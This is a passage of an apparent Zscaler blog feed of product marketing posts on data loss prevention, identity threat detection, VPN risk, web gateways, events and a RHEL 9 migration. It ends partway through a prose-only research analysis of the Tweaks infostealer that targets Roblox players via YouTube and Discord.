In the healthcare industry, the use of personal devices by medical professionals and contractors poses a unique challenge. Implementing browser isolation technology allows for seamless data access on personal devices that doesn’t compromise their security. By hosting browser sessions in a secure cloud environment, sensitive data remains protected, even on unmanaged devices. Better yet, users get the specialized power of a purpose-built enterprise browser, only when needed, without having to change which browser they use.

Perhaps the biggest benefit of SSE is that all of these unique features are integrated into a centralized, cloud-delivered platform. When hosted via the cloud, DLP is not only easier to deploy, but also more accurate in detection. Rather than dealing with multiple policies that could trigger differently and at different times, SSE gives you a singular view across your landscape, so decisions can be made on a holistic basis.
Securing Data at Rest in the Medical Industry

When it comes to securing medical data at rest, it’s worth learning and remembering a few key capabilities that have helped healthcare organizations do so with greater ease:

- SaaS Data Security lets you prioritize securing sensitive data in SaaS platforms, as it can be easily shared in risky ways. To prevent this, providers often consider adding CASB to their data protection strategy. By using a CASB that applies the same DLP policy to data at rest as to data in motion, you can reduce alert fatigue and streamline response times. Since the DLP engines trigger the same way on data inline and at rest in SaaS, visibility becomes consistent across channels. This is one of the main advantages of standardizing on a Security Service Edge architecture.

- SaaS Security Posture Management (SSPM) helps to identify and address misconfigurations in SaaS platforms, such as enabling multifactor authentication and closing risky open shares. Look for SSPM platforms that align with compliance frameworks like NIST or HIPAA to establish and maintain the required security posture.

- SaaS Supply Chain Security helps address the risks associated with third-party applications that may connect into your SaaS platforms. You can scan SaaS platforms for risky connections from third-party applications that may have known vulnerabilities or allow unauthorized access to sensitive medical data. You’ll then get guidance on how to revoke these connections to ensure data hygiene and maintain a strong posture overall.

- Endpoint DLP protects sensitive data stored on endpoints such as removable media or employee devices. Implement endpoint DLP with a unified agent that works alongside an SSE platform and enforces a unified DLP policy through inline inspection. This helps prevent data leaks and ensures the security of patient information.
A word on Zscaler and shared workstation security

Securing data on shared workstations can sometimes be a challenge, as implementing and managing user-level policy controls across multiple logins on a single device is often difficult to do. Zscaler integrates with the Imprivata Digital Identity platform, allowing providers to easily support these multi-user workstation environments. Clinicians can easily and securely authenticate in and out of devices and only access applications for which they’ve been authorized.

Bringing it All Together

Unifying data protection into one platform is extremely powerful and can drastically simplify how you secure data. When delivered from an always-on cloud, you get one single DLP policy that follows users everywhere, as well as consistent alerting, no matter where data is located.

It’s helpful to gain a variety of perspectives on how to secure data, especially when it comes to a task as tricky as protecting medical data. While there are a multitude of different approaches to this task, understanding best practices can make all the difference for providers looking to begin their journey. All of this said, building the right architecture is equally important. If you’re interested in learning more about Security Service Edge and how Zscaler can help you secure your patient data, we’re here to chat or show you a demo.

Photo Credit: Image by https://www.freepik.com/free-photo/medical-banner-with-doctor-working-laptop_30555907.htm

Tue, 26 Mar 2024 05:33:13 -0700 Tamer Baker https://www.zscaler.com/blogs/product-insights/best-medicine-healthcare-data-integrated-dlp

Protecting Identity Becomes Pivotal in Stopping Cyberattacks
https://www.zscaler.com/blogs/product-insights/protecting-identity-becomes-pivotal-stopping-cyberattacks

As today’s workplace transforms, data is no longer centralised and is spread across the cloud, increasing the attack surface.
Attackers are constantly looking for vulnerabilities to exploit and searching for the Achilles heel in identity systems that could deliver them entry into your IT environment. Cyber actors are now using sophisticated methods to target identity and access management infrastructure. Credential misuse is the most common attack method. According to Gartner, “Modern attacks have shown that identity hygiene is not enough to prevent breaches. Multifactor authentication and entitlement management can be circumvented, and they lack mechanisms for detection and response if something goes wrong.” Prioritize securing identity infrastructure with tools to monitor identity attack techniques, protect identity and access controls, detect when attacks are occurring, and enable fast remediation.

Zscaler ITDR detects credential theft and privilege misuse, attacks on Active Directory, and risky entitlements that create attack paths.

With identity-based attacks on the rise, today’s businesses require the ability to detect when attackers exploit, misuse, or steal enterprise identities. Identifying and detecting identity-based threats is now crucial due to attackers' propensity for using credentials and Active Directory (AD) exploitation techniques for privilege escalation and for lateral movement across your environment. Zscaler ITDR helps you thwart identity-based AD attacks in real time and gain actionable insight into gaps in your identity attack surface. The solution enables you to continuously monitor identities, provides visibility into misconfigurations and risky permissions, and detects identity-based attacks such as credential theft, multifactor authentication bypass, and privilege escalation.

Gain Full Visibility

Uncover blind spots and understand hidden vulnerabilities that leave your environment susceptible to identity-based attacks, such as exposed surfaces, dormant credentials, and policy violations.
Real-Time Identity Threat Detection and Response

Zscaler Identity Protection uses identity threat detections and decoys that raise high-fidelity alerts to help your security teams swiftly remediate with a targeted response. The same endpoint agent that runs deception also detects identity attacks on the endpoint. These include advanced attacks like DCSync, DCShadow, LDAP enumeration, session enumeration, Kerberoast attacks, and more.

Reduce Identity Risk

With deep visibility into identity context, Zscaler Identity Protection helps your security teams identify, address, and purge compromised systems and exposed credentials quickly. Often, security teams struggle to collect the context and correlations needed to investigate threats. Zscaler ITDR solves this problem by consolidating all risk signals, threats detected, failed posture checks, Okta metadata, and policy blocks (ZIA/ZPA) into a single view for each identity. You can now quickly investigate risky identities for indicators of compromise and potential exploitation.

Prevent Credential Misuse/Theft

Attackers use stolen credentials and attack Active Directory to escalate privileges and move laterally. Zscaler Identity Protection helps to detect credential exploits and prevent credential theft or misuse.

Spot Lateral Movement

Stop attackers who have gotten past perimeter-based defenses and are attempting to move laterally through your environment. Zscaler Deception ITDR enhances security by identifying misconfigurations and credential exposures that create attack paths for attackers to use for lateral movement.

Zscaler ITDR: Beyond just prevention – Monitor, detect, & respond to identity threats

Monitor: Identity systems are in constant flux with configuration and permission changes. Get alerts when configuration changes introduce new risks.
Organizations lack visibility into credential sprawl across their endpoint footprint, leaving them vulnerable to attackers who exploit these credentials to access sensitive data and apps. Zscaler ITDR addresses this by auditing all endpoints to identify credentials and other sensitive material in sources such as files, the registry, memory, caches, configuration files, credential managers, and browsers. This visibility into endpoint credential exposure lets you identify lateral movement paths, enforce policies, and clean up credentials to reduce the internal attack surface.

Detect: ITDR automatically surfaces hidden risks that might otherwise slip through the cracks. Zscaler ITDR pulls together all risk signals, threats detected, posture checks failed, metadata from Okta, and policy blocks from ZIA/ZPA into a single unified view to provide a complete picture of risk for an identity. This helps to identify and detect unmanaged identities, misconfigured settings, and even credential misuse.

Respond: When ITDR spots attacks targeting your identity store, you can take immediate action. Restrict or terminate the identities causing trouble and shut down threats before they have a chance to wreak havoc.

Zscaler ITDR Benefits

Minimize the Attack Surface: Reduce the attack surface by gaining continuous visibility into attack vectors and identity misconfigurations. Use the traps you have set to stop adversarial advances, including ransomware attacks, in their tracks.

Real-Time Identity Threat Detection: Thwart sophisticated attacks on Active Directory using identity threat detections on endpoints.

Accelerate Incident Response: Built-in threat detection and response speeds up threat detection and expands coverage to significantly reduce mean time to respond (MTTR). ITDR helps security teams drive down their mean time to respond and prioritize what matters most through risk scoring.
Conclusion

No matter what, breaches are inevitable, and preventative security measures aren’t sufficient to thwart them. Though staying upbeat while fighting cyberthreats, shrinking budgets, and staff turnover is a tall task, how we respond today dictates how we perform tomorrow. Choosing and adopting identity protection solutions like ITDR helps your company evolve its zero trust security and compliance posture in response to the changing threat landscape. Zscaler ITDR strengthens your zero trust posture by mitigating the risks of user compromise and privilege exploitation.

Fri, 22 Mar 2024 02:39:16 -0700 Nagesh Swamy https://www.zscaler.com/blogs/product-insights/protecting-identity-becomes-pivotal-stopping-cyberattacks

Eliminate Risky Attack Surfaces
https://www.zscaler.com/blogs/product-insights/eliminate-risky-attack-surfaces

Many moons ago, when the world wide web was young and the nerd in me was strong, I remember building a PC and setting it up as a web server. In those exciting, pioneering days, it was quite something to be able to have my very own IP address on the internet and serve my own web pages directly from my Apache server to the world. Great fun. I also remember looking at the server logs in horror as I scrolled through pages upon pages of failed login, and presumably hacking, attempts. I’d buttoned things up pretty nicely from a security standpoint, but even so, it would only have taken a vulnerability in an unpatched piece of software for a breach to occur, and from there, all bets would have been off. Even today, many internet service providers will let you provision your own server, should you feel brave enough. Of course, the stakes were not high for me at home, but knowing what we know now about the growth of ransomware attacks and how AI is facilitating them, no organization would dare do such a thing in 2024. Back then, I’d created an obvious and open attack surface.
Tools were (and still are) readily available to scan IP address ranges on any network and identify open ports. In my case, ports 22, 80 and 443 were open to serve web pages and enable me to administer my server remotely. Every open port is a potential conduit into the heart of the hosting device, and so these should be eliminated where possible.

Open ports, VPNs, and business

Since online remote working became a real possibility in the early 2000s, organizations have tried to protect themselves and their employees by adopting VPN technology to encrypt traffic between a remote device and a VPN concentrator at the head office, allowing employees access to services like email, file and print servers. Even when these services became cloud-based solutions like Gmail and Dropbox, many organizations pulled that traffic across a VPN to apply IT access policies. Not only did this often lead to an inefficient path from a remote worker to their applications, it also presented a serious security risk.

As the performance and dependability of the internet grew, we also saw the advent of site-to-site VPNs, which made for an attractive alternative to far more expensive circuit-based connections that had been so prevalent, such as MPLS. A vast number of organizations continue to rely on a virtual wide area network (WAN) built on top of VPNs. Unfortunately, as the old saying goes, there’s no such thing as a free lunch. Every VPN client or site using the internet as its backbone needs an IP address to connect to, an open port to connect through, and, well, you can see where this is going. Not every VPN solution has an active flaw, just as—luckily—my Apache server didn’t at the time I was running it. That said, software is fallible, and history has demonstrated this fact in numerous instances in which vulnerabilities are discovered and exploited in VPN products.
Just last month, a fatal flaw was discovered in Ivanti’s VPN services, leaving thousands of users and organizations open to attack. Hackers are scouring day and night for vulnerabilities like these to exploit—and AI is only making their lives easier.

“Without proper configuration, patch management, and hardening, VPNs are vulnerable to attack.” — Securing IPsec Virtual Private Networks, National Security Agency (NSA)

Zscaler is different

The Zscaler Zero Trust Exchange™ works in a fundamentally different way—no VPN is required to securely connect. Instead, connections via the internet (or even from within a managed network) are policed on multiple levels. An agent on your device creates a TLS tunnel to the Zscaler cloud, which accepts connections only from known tenants (Zscaler customers). This tunnel is mutually authenticated and encrypted between the agent and the Zscaler cloud. The individual and their device(s) must additionally be identified as part of the process. In short, it’s not possible to simply make a TLS connection to Zscaler.

Once an approved user from a known customer with a recognized device connects to Zscaler, they’re still prevented from moving laterally over the network, as they could with a VPN. With Zscaler, there is no IP range to which the user has access. Instead, every connection attempt has to be authorized, following the principles of zero trust. A user has access only to the applications for which they’ve been authorized. With this framework, even if an organization were to be successfully attacked, the blast radius would be limited. The same cannot be said for network-based security.

Here’s the bottom line: VPNs and the firewalls behind them served us well for a long time, but the challenges that come with maintaining a security posture built on these legacy technologies are so great that it’s now a material business risk to use them. You need only turn on the news for a few minutes to be reminded of this.
Networks were built fundamentally to enable connectivity, and adding security to these networks is an uphill battle of putting the right obstacles in the way of that connectivity. This is why more and more public bodies and private organizations are turning this idea on its head and embracing a zero trust architecture that provides access only for an approved entity, on an approved device, to the applications to which they are entitled.

At Zscaler we have built tools to help you assess the potential risk your own organization faces, some of which are free to access. Test your own defenses by visiting https://www.zscaler.com/tools/security-assessment and, when you’re ready to learn more, get in touch!

Tue, 02 Apr 2024 01:00:01 -0700 Simon Tompson https://www.zscaler.com/blogs/product-insights/eliminate-risky-attack-surfaces

Break Free from Appliance-Based Secure Web Gateway (SWG)
https://www.zscaler.com/blogs/product-insights/break-free-appliance-based-secure-web-gateway-swg

The way we work today is vastly different from a few years ago. McKinsey & Company’s State of Organization 2023 report identified that before the COVID-19 pandemic, most organizations expected employees to spend more than 80% of their time in-office. But as of 2023, says the report, 90% of employees have embraced hybrid models, allowing them to work from home or other locations some (if not most) of the time. On a similar note, applications previously hosted in on-premises data centers are increasingly moving to the cloud. Gartner predicted that SaaS application spending would grow 17.9% to total $197 billion in 2023. With employees and apps both migrating off-premises, security controls logically must do the same. It’s no exaggeration to state that cloud and mobility have broken the legacy way of approaching security—so why should the castle-and-moat security approach, heavily reliant on hardware such as appliance-based proxies/SWGs, still exist?
Users need fast, reliable, secure connectivity to the internet and cloud apps, with the flexibility to connect and work from anywhere. However, traditional SWGs have certain limitations, leading to security challenges, poor user experience, constant maintenance, and scalability issues. Let’s take a look at why it’s time to break free from appliance-based SWG.

Security challenges

In December 2013, the Google Transparency Report showed just 48% of World Wide Web traffic was encrypted. Today, the same report shows at least 95% of traffic is encrypted. So, it’s no surprise that the Zscaler ThreatLabz 2023 State of Encrypted Attacks report showed 85.9% of threats—malware payloads, phishing scams, ad spyware sites, sensitive data leaks, and more—are now delivered over encrypted channels. While most organizations have some form of protection against malware, attackers are evolving their techniques, creating new variants able to bypass reputation-based detection technologies. As threat actors increasingly rely on encrypted channels, it’s more crucial than ever to inspect 100% of TLS/SSL traffic.

This is the biggest way appliance-based proxies weigh down organizations: most SWG appliances lack the capacity to perform 100% inspection. Our 2023 State of Encrypted Attacks report surveyed 284 IT, security, and networking professionals and found that they mainly use legacy tools like web application firewalls and network-layer firewalls to scan traffic. However, respondents agreed that complexity, cost, and performance degradation are the biggest barriers to inspecting all TLS/SSL traffic. Furthermore, certain regulations require different policies for distinct data types, making inspection an arduous task.

Poor user experience

Compared to only a few years ago, the meaning of “fast” is very different for today’s internet users. Instant access and connectivity have become the norm at home.
Employees juxtapose the great digital experience in their personal lives with poor connectivity and performance issues that plague their digital work lives. Appliance-based SWGs are among the main culprits of poor user experience because they can’t scale quickly to handle traffic surges, and they require traffic to be backhauled to a central data center, leading to high latency and lost productivity for users trying to access the internet or SaaS applications. And all this inevitably affects revenue. Maintenance and scalability issuesApart from complexity and tedious management, other challenges of appliance-based SWGs are maintenance and scalability issues. To account for traffic surges and future growth, security teams are forced to overprovision, leading to expensive appliances sitting unused. At other times, they may need to wait multiple months for appliances/upgrades to arrive. With appliance-based SWG, security teams are always spread too thin, having to constantly update SWGs to account for changes to the organization and/or the threat landscape. The Zscaler differenceOvercome the limitations of appliance-based SWG with Zscaler. Better security: Inspect 100% of TLS/SSL traffic to find and stop threats—86% of which are delivered over encrypted channels. Better user experience: Stop backhauling internet/SaaS traffic with AI-powered Zscaler SWG, delivered from 150+ points of presence worldwide–close to your users and their cloud destinations for lower latency. No hardware to maintain: Move to a cloud native proxy architecture and eliminate the hardware headaches of maintenance, updates, patches, and upgrades. Platform approach: Extend comprehensive security functions, such as cloud firewall, sandbox, CASB, and data loss prevention, as well as end-to-end experience monitoring from a single unified platform and agent. If you’d like to know more about the reasons to break free from appliance-based proxies, check out this on-demand webinar. 
Wed, 20 Mar 2024 07:04:23 -0700 Apoorva Ravikrishnan https://www.zscaler.com/blogs/product-insights/break-free-appliance-based-secure-web-gateway-swg Mobile World Congress shows a vision of even more connected things https://www.zscaler.com/blogs/company-news/mobile-world-congress-shows-a-vision-of-even-more-connected-things I approached this year’s Mobile World Congress as I usually would – with a very open mind. However, this year was different. It was far more fulfilling than previous years and, in some ways, had me feeling overwhelmed. Not so much by the sheer distances walked each day (approximately 20 kilometers) but by the types of discussions about the state of the telco industry and its future directions that were both enlightening and refreshing. For the first time I had the feeling that 5G will reach new milestones this year based on the various innovations that were on show. Telco networks need to seize opportunities Network operators globally are shaping their future, with MWC serving as the perfect moment to come together and discuss perspectives and the various opportunities that need to be recognised. Within this, what they can offer with regards to insights into data streams and providing additional overlays or security services on top to make their services more valuable and stick for customers were some of the key focus points. More important, however, is the growing opportunity to be more connected than ever before, offering the maximum potential of interconnectivity. Thanks to this, there is a clear opportunity for collaboration and the critical next steps that will define the future of telco networks for years to come. For this to happen, however, telcos must start seeing the value of their infrastructure. Similarities can be drawn with parallel industries, take banking for example. The SWIFT network is critical for international money transfers. 
While the SWIFT network works well, consumers demanded a faster, simpler way to move money, and the financial industry responded with more agile alternatives such as Venmo, PayPal, and intra-bank networks to deliver high-speed transactions. These additional services are what drive adoption and add value to financial networks. Telcos, however, risk falling into two traps: becoming a network provider that simply moves data traffic, or expanding their offerings by bundling additional services, such as partnering with Netflix as part of an entertainment package at no extra charge. So far in telco we haven't seen a level of innovation within its services that will lead to additional demand for and consumption of said services. This is where true innovation will happen in the near future. Optimisations are required between every single network and service operator that is delivering or creating content. In the age of AI, the level of data and measurement that can be consumed to ensure the best set of services must be leveraged, from understanding how to best compress a video file through to moving and allowing disparate edge computing usage. All of this is to be delivered through intelligent insights. A few companies have the foresight to realise that they must start looking into the contextual aspects of interconnectivity. It is more important to figure out why a specific device is connected on a specific network, when thousands of devices are making connections every second. Telco providers need to find a way to bucket this information to orchestrate the data streams effectively and deliver on the value of the data that is created.

My key takeaways from the show are:

SIMs are literally everywhere

From facilitating seamless communication between devices to enabling groundbreaking technologies, the versatility and adaptability of SIM cards are redefining the boundaries of connectivity. eSIMs will allow organisations to provide country-specific access to data that travels with the user. The question that pops into my head is how these data streams will be secured in the future.

5G is real

5G is no longer a theory, even in Europe. While we still don't have proper standalone 5G in Europe, private 5G has matured to be widely accepted and used. In previous years we were always waiting for the killer app and speculating about virtual reality goggles occupying this space. This year, more and more applications are demonstrating the potential of virtual worlds, e.g., for training purposes.

Data sovereignty is a driving force

Given our fragile global situation, the topic of data sovereignty has been getting more attention. Organisations and governments alike want to be able to take active control of the locations of their data, not only its resilience. The debate steered by NIS2 and new security measures for national critical infrastructure ties into data sovereignty, software, and cloud ecosystems as well.

Moving forward, the focus will be on connectivity being delivered everywhere now that almost everything is SIM-enabled. There will also be questions around how telcos will make use of all the available information and, perhaps more importantly, how they can orchestrate it in one environment and deliver effective controls. The great unifier is security: every user, company, and service demands uniform security on any network. Zscaler, as the world's largest cloud security service, available everywhere, is well placed to deliver this glue.
Wed, 20 Mar 2024 04:06:08 -0700 Nathan Howe https://www.zscaler.com/blogs/company-news/mobile-world-congress-shows-a-vision-of-even-more-connected-things

2024 Zscaler Public Sector Summit in Washington DC https://www.zscaler.com/blogs/product-insights/2024-zscaler-public-sector-summit-washington-dc

In March 2023 Zscaler held its inaugural Public Sector Summit, bringing together over 500 government and industry leaders to separate zero trust fact from fiction. The exchange last year was enlightening and energizing! We captured highlights from the event in an eBook, The Power of Zero Trust, including the challenges agencies are facing, some of our best practices for developing a robust zero trust architecture, and a use case demonstrating how zero trust can integrate into every part of your agency's operations. As we prepare for the 2024 Public Sector Summit on April 4th, I am excited that this year's lineup will be bigger and even more engaging. With more than 22 guest speakers from across government, education, and the private sector, the audience will hear top-of-mind topics and discuss current threats and challenges facing agencies and the supporting community, such as AI, funding zero trust initiatives, safeguarding critical infrastructure, SD-WAN, and much more.

Distinguished Speakers

The power of the public sector community is in the forward-thinking individuals across agencies who have dedicated their careers to transforming our nation securely. We've built a program for the day with a stellar lineup of speakers including:
- Dr. Kelly Fletcher, CIO, Department of State; Luis Coronado, CIO, State Consular Affairs; and Eric Hysen, CIO/Chief AI Officer, Department of Homeland Security, who will join Zscaler CEO Jay Chaudhry during his keynote.
- Chris DeRusha, Federal CISO and Deputy National Cyber Director, OMB.
- Panel on resources to fuel government modernization with Jessie Posilkin, Technical Lead at the Technology Modernization Fund, Maria Roat of MA Consulting, and Eric Mill of GSA.
- Suneel Cherukuri, CISO, DC Government.
- Zach Benz, Sr. Mgr for Cyber Operations/DCISO with Sandia National Laboratories, to talk about AI/ML.
- Panel discussing zero trust implementations with Gerald Caron, CIO, ITA/Commerce, Dan Han, CISO of VCU, Bob Costello, CISO of CISA, and Dr. Gregory Edwards, CISO of FEMA.
- DoD leaders including Winston Beauchamp, DCISO with the Department of the Air Force, and General Les Call, Director of the Zero Trust Portfolio Management Office.
- Systems Integrator panel with Justin DePalmo, CISO and VP of IT at GDIT, and Bob Ritchie, SVP & CTO at SAIC.
- Nelson Sims, Cyber Architect, DC Water, and Dustin Glover, Chief Cyber Officer, State of Louisiana, to discuss securing critical infrastructure.

From Revolution to Evolution

Our CEO and founder, Jay Chaudhry, will keynote the event, setting the stage with his perspective on the zero trust revolution that began over a decade ago and how it has now surpassed the tipping point in adoption thanks to the dedication of IT leaders across government. He will be joined on stage by Dr. Fletcher, Luis Coronado, and Eric Hysen, followed by many more innovators within the public sector speaking to a number of current cybersecurity issues, including:
- Using AI to combat AI-based threats
- OMB's perspective on the state of zero trust
- Unlocking resources to continue modernizing
- How agency leaders are taking the next steps in their zero trust implementations
- New innovations in predictive cybersecurity to identify and resolve vulnerabilities

View the full agenda here to see the range of topics to be addressed during this year's summit.
Hands-On Zero Trust

In addition to the informative sessions, we will also have hands-on solution stations this year for attendees to dive deeper into areas including:
- From Zero Access to Zero Trust in 10 Minutes: A joint solution with our integration partners AWS, Okta, and CrowdStrike
- Your Network Transformed: Zero trust for cloud and branch
- ThreatLabz: Global internet threat insights from Zscaler's research team
- CMMC: Empowered by zero trust
- Customer Success Center
- Zscaler Digital Experience

We're excited to welcome the public sector community in person for a full day of learning, networking, and experiences from the most forward-thinking government IT leaders. Register today to learn more on how you can Simplify, Secure, and Transform your agency. Space is limited for this live event, so we'll be in touch to confirm your invitation. There is no charge for the event.

Tue, 19 Mar 2024 08:03:31 -0700 Peter Amirkhan https://www.zscaler.com/blogs/product-insights/2024-zscaler-public-sector-summit-washington-dc

Zscaler Selects Red Hat Enterprise Linux 9 (RHEL 9) as Next-Gen Private Access Operating System https://www.zscaler.com/blogs/product-insights/zscaler-selects-red-hat-enterprise-linux-9-rhel-9-next-gen-private-access

What's new?

On June 30, CentOS 7 will reach end of life, requiring migrations in many software stacks and server environments. In advance of this, Zscaler has selected Red Hat Enterprise Linux 9 as the next-generation operating system for Zscaler Private Access (ZPA). RHEL 9 is the current successor to the RHEL 7 codebase that CentOS 7 rebuilt, is backed by Red Hat, and is supported through 2032. This continues ZPA's proven stability and resiliency on open source Linux platforms and builds on 10 years of maturity on Red Hat Enterprise Linux-based derivatives. What's more, this transition can be done with no impact to operations or user access.

When will it be released?

Pre-built images for all ZPA-supported platforms are targeted for release in May 2024.
All ZPA images, including containers, hypervisors, and public cloud offerings, will be replaced with RHEL 9 builds. This is the recommended deployment for all future App Connector and Private Service Edge components, and customers should begin migration immediately on release. For customers that manage their own Red Hat base images, Zscaler is targeting the end of April 2024 for release of RHEL 9-native Red Hat Package Manager (RPM) packages and repositories.

New Enterprise OS Without Licensing Fees

To ensure an excellent experience for our customers, Zscaler will provide operating system licenses for all RHEL 9 images on supported platforms. This continues our commitment to secure, open source platforms without imposing additional licensing costs on our customers. We also understand the need for control over security baseline images that meet your security posture and will continue to provide RPM options through support of RHEL 8 and RHEL 9. These software packages are bring-your-own-license (BYOL) and won't conflict with any existing Red Hat enterprise license agreements you may hold.

CentOS 7 End of Life

The CentOS Project ends support for CentOS 7 on June 30, 2024, the same date on which RHEL 7 leaves Red Hat's Maintenance Support phase. While we aim to provide RHEL 9 support in advance of this date (and do currently support RHEL 8 with RPMs), we recognize that the transition is a large undertaking, affecting all enterprise data centers and operations, and that moving to new operating systems and software will take time. In light of this, we want to provide ample time to migrate while considering the security implications of continuing to support an obsolete operating system. Zscaler will support existing CentOS 7 deployments, RPMs, and distribution servers until December 24, 2024. We are confident our ZPA architecture and design uniquely position us to continue to support CentOS 7 past its expiry date.
See End-of-Support for CentOS 7.x, RHEL 7.x, and Oracle Linux 7.x for more details on CentOS EOL, and the ZPA white paper for architecture and security design. While we have ample controls in place and the utmost confidence, there is always inherent risk in running an unsupported server operating system: Zscaler will not provide backported operating system patches during this transition, but will maintain the ZPA software and its supporting security libraries. Any kernel or base-OS vulnerability disclosed after June 30, 2024 therefore remains unpatched on a CentOS 7 host until that host is replaced.

Lightweight and Container Orchestration Ready

Following Zscaler's cloud-native and best-in-class zero trust approach, ZPA infrastructure components are designed to be lightweight, container ready, and quickly deployed. This allows App Connectors and Private Service Edges to be scaled and migrated without worrying about previously deployed instances or operating system upgrade paths. For these reasons, the migration best practice is to deploy new App Connectors and Private Service Edges. Zscaler does not provide direct operating system upgrade paths for currently deployed infrastructure components. In further support of this, we offer Open Container Initiative (OCI) compatible images for Docker CE, Podman, and Red Hat OpenShift Platform. These images, as well as the public cloud marketplace images, are fully ready for autoscale groups, supporting quick scale-up and scale-down.

Migration and Support Excellence

Zscaler understands your concerns and will fully support you throughout this transition process. Our Technical Account Managers, Support Engineers, and Professional Services are ready to address all concerns related to migration. If a temporary increase of App Connector or PSE limits is needed in your environment to complete migration, there will be no extra licensing cost. Below are the steps to help you replace CentOS 7 instances with RHEL 9.
The enrollment and provisioning of new App Connectors and Private Service Edges can be automated in a few steps using Terraform (infrastructure-as-code) or container orchestration to simplify deployment further.

App Connector Migration Steps:

1. Create new App Connector Groups and provisioning keys for each location. Note: do not reuse existing provisioning keys, as that enrolls the new RHEL 9 App Connectors into the old App Connector Groups. Mixing different host OS and Zscaler software versions in a single group is not supported.
2. Update the new App Connector Group's version profile to "Default - el9" so that it receives the correct binary updates. (This version profile can be set as the tenant default once all connectors are moved to RHEL 9.)
3. Deploy new VMs using the upcoming RHEL 9 OVAs and the newly created provisioning keys (templates can be used).
4. Add the new App Connector Groups to each respective Server Group.
5. (Optional) In the UI, disable the CentOS 7 App Connector Groups five minutes prior to the regional off-hours maintenance window to allow connections to drain gradually.
6. During regional off-hours, remove the CentOS 7 App Connector Groups.

Private Service Edge Migration Steps:

1. Create new Service Edge Groups and provisioning keys for each location. Note: do not reuse existing provisioning keys, as that enrolls the new RHEL 9 PSEs into the old Service Edge Groups. Mixing different host OS and Zscaler software versions in a single group is not supported.
2. Update the new Service Edge Group's version profile to "Default - el9" so that it receives the correct binary updates. (This version profile can be set as the tenant default once all connectors and PSEs are moved to RHEL 9.)
3. Deploy new VMs using the upcoming RHEL 9 OVAs and the newly created provisioning keys (templates can be used).
4. Add trusted networks and enable "publicly accessible" (if applicable) on the new Service Edge Groups.
5. (Optional) In the UI, disable the CentOS 7 Service Edge Groups 15 minutes prior to the regional off-hours maintenance window to allow connections to drain gradually.
6. During regional off-hours, remove trusted networks and disable public access (if applicable) on the CentOS 7 Service Edge Groups.

Please reach out to your respective support representatives for further assistance and information as needed.

For more information:
- Zscaler Private Access Website
- Zscaler Private Access | Zero Trust Network Access (ZTNA)
- End-of-Support for CentOS 7.x, RHEL 7.x, and Oracle Linux 7.x
- ZPA App Connector Software by Platform
- ZPA Private Service Edge Software by Platform

Mon, 18 Mar 2024 15:34:32 -0700 Shefali Chinni https://www.zscaler.com/blogs/product-insights/zscaler-selects-red-hat-enterprise-linux-9-rhel-9-next-gen-private-access

Tweaks Stealer Targets Roblox Users Through YouTube and Discord https://www.zscaler.com/blogs/security-research/tweaks-stealer-targets-roblox-users-through-youtube-and-discord

Introduction

Zscaler's ThreatLabz recently discovered a new campaign distributing an infostealer called Tweaks (aka Tweaker) that targets Roblox users. Attackers are exploiting popular platforms, like YouTube and Discord, to distribute Tweaks to Roblox users, capitalizing on the reputation of legitimate platforms to evade web filter block lists that typically block known malicious servers.
Attackers share malicious files disguised as frames per second (FPS) optimization packages with users and, in turn, users infect their own systems with Tweaks malware. Given that 45% of Roblox users are under 13, it's probable that the malware being circulated could extend to parents' systems. Furthermore, with the proliferation of remote work, there's a possibility of this malware infiltrating corporate devices (surreptitiously) used by children of employees. Not only does a successful infection leave Roblox account data vulnerable, but it may also compromise the rest of the data on the device. In this blog, we analyze the Tweaks attack campaign and its technical characteristics.

Key Takeaways

- The Tweaks or Tweaker stealer masquerades as a tool to enhance frames per second (FPS) for Roblox users while it steals data in the background without the user's knowledge.
- The attackers leverage YouTube by enticing users to watch videos on "How to increase FPS" that contain links to their Discord groups. Once users join these groups, the attackers provide them with links to malicious files disguised as game tweaks and modifications.
- The stealer is PowerShell-based and exfiltrates sensitive data like user information, location, Wi-Fi profiles and passwords, Roblox IDs, and in-game currency details.
- Once sensitive data is obtained, it is sent via a Discord webhook to a channel the attacker controls.
- ThreatLabz researchers discovered multiple attackers copying a "free" version of Tweaks and using it to sell "paid" versions.

Background

Why is FPS appealing to Roblox users?

Roblox boasts a massive user base consisting of millions of players worldwide. Roblox offers a diverse range of games and experiences, allowing players to explore virtual worlds and engage in various activities. One feature that attracts Roblox players is the desire for an enhanced gaming experience, including improved FPS.
Higher FPS can result in smoother gameplay, making it an appealing prospect for players seeking optimal performance. It's not unusual for gamers to download optimization tools from popular platforms like YouTube and Discord to increase their hardware performance, making it more likely that a gamer might unintentionally download the Tweaks malware.

Gaming sees more cyber attacks

Roblox's significant user base of 71.5 million daily active users makes it an attractive target for cyber attackers. In addition, a 2024 report shows that the gaming industry is now worth around $455.27 billion. In light of these trends, it is not surprising that hackers looking to exploit and monetize sensitive data are targeting Roblox users, who, like many other gamers, store a wealth of data in their gaming accounts.

Campaign Analysis

During our investigation, we discovered several YouTube channels and videos offering tutorials on how to improve FPS in Roblox. In these videos, Roblox players were instructed to disable their antivirus software to ensure the smooth operation of a "PC optimizer" without encountering any issues. In reality, this tactic is used to make a user's system easier to infect with malware. In the description boxes of these videos, links to the attacker's corresponding Discord groups are provided. Figure 1 below shows a Tweaks YouTube channel, the Discord group links provided to the user, and the initial Tweaks interface that appears when users download the initial file.

Figure 1: An example of a Tweaks YouTube channel, links to Discord groups, and the Tweaks interface.

Once they enter the attacker-controlled Discord channels, users encounter both free and paid versions of FPS optimization files. Our initial analysis revealed that both versions were identical, utilizing the same BAT file. Consequently, the choice between the free and paid versions had no impact on the outcome.
The only distinction was that users who opted for the paid version experienced a small financial loss on top of having their data stolen. Presently, attackers entice new users by offering a free version with limited optimization features, alongside a paid version that promises more advanced optimization capabilities. Once users download the files, they unknowingly install the Tweaks malware, which not only infects their system but also puts their data at risk of being stolen. From the user's perspective, everything seems normal, as the Tweaks malware genuinely performs FPS optimization. This deceptive behavior makes users less suspicious of the malware since it appears to be fulfilling its intended purpose. Figure 2 below shows both the paid and free version of Tweaks on the Discord channel.

Figure 2: An example of the Discord group advertising FPS optimization files to distribute Tweaks malware.

Case Study 1

After joining the Discord group, Roblox gamers are directed to download a malicious BAT file from a Mediafire link, leading to a malware infection. Once the malware is executed, the BAT file presents users with the Tweaks menu interface while simultaneously stealing their information in the background. The stolen data is then sent via Discord webhooks to an attacker-controlled Discord channel. The figure below illustrates the Tweaks attack chain.

Figure 3: The Tweaks attack chain involving a Discord group supplying a BAT file.

Case Study 2

